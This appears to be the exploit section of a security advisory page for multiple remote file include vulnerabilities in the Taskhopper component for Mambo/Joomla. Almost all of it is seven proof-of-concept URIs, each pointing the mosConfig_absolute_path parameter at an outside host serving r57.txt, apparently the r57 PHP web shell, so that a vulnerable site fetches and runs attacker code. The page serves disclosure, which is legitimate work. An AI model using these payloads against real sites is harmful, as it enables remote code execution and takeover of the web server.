• info
• discussion
• exploit
• solution
• references

Mambo/Joomla Taskhopper MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
http://www.example.com/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?